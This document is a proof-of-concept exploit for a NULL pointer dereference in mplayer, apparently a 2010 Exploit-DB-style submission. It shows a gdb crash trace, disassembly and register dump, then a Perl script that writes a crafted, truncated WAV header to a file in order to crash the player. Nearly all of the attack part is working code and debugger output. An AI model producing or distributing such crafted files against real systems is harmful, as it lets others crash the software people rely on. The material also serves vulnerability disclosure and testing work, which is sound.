# Exploit Title: mplayer <= 4.4.1 NULL pointer dereference exploit poc 0 day # Date: 17/03/2010 # Author: Pietro Oliva # Software Link: # Version: <= 4.4.1 # Tested on: ubuntu 9.10 but should work in windows too # CVE : #Program received signal SIGSEGV, Segmentation fault. #0x081176d8 in af_calc_filter_multiplier () #(gdb) disas af_calc_filter_multiplier #Dump of assembler code for function af_calc_filter_multiplier: #0x081176d0 : push %ebp #0x081176d1 : mov %esp,%ebp #0x081176d3 : fld1 #0x081176d5 : mov 0x8(%ebp),%eax #0x081176d8 : mov (%eax),%eax ==> mplayer tries to dereference eax, which is a NULL pointer!!! #0x081176da : lea 0x0(%esi),%esi #0x081176e0 : fmull 0x28(%eax) #0x081176e3 : mov 0x18(%eax),%eax #0x081176e6 : test %eax,%eax #0x081176e8 : jne 0x81176e0 #0x081176ea : pop %ebp #0x081176eb : ret #End of assembler dump. # REGISTERS: #eax 0x0 0 ==========> NULL #ecx 0xfa157a57 -99255721 #edx 0x1fe0 8160 #ebx 0x8509a08 139500040 #esp 0xbfffe2e8 0xbfffe2e8 #ebp 0xbfffe2e8 0xbfffe2e8 #esi 0x7b84000 129515520 #edi 0xf8000 1015808 #eip 0x81176d8 0x81176d8 #eflags 0x10216 [ PF AF IF RF ] #cs 0x73 115 #ss 0x7b 123 #ds 0x7b 123 #es 0x7b 123 #fs 0x0 0 #gs 0x33 51 #!/usr/bin/perl print "[+] mplayer <= 4.4.1 NULL pointer dereference exploit poc 0 day by Pietro Oliva\n"; print "[+] pietroliva[at]gmail[dot]com http://olivapietro.altervista.org\n"; print "[+] creating crafted file mplayer.wav\n"; $buffer="\x52\x49\x46\x46\x1f\x04\x00\x00\x57\x41\x56\x45\x66\x6d\x74\x20\x10\x00\x00\x00\x01\x00\x1f"; open(file,"> mplayer.wav"); print(file $buffer); print "[+] done!\n";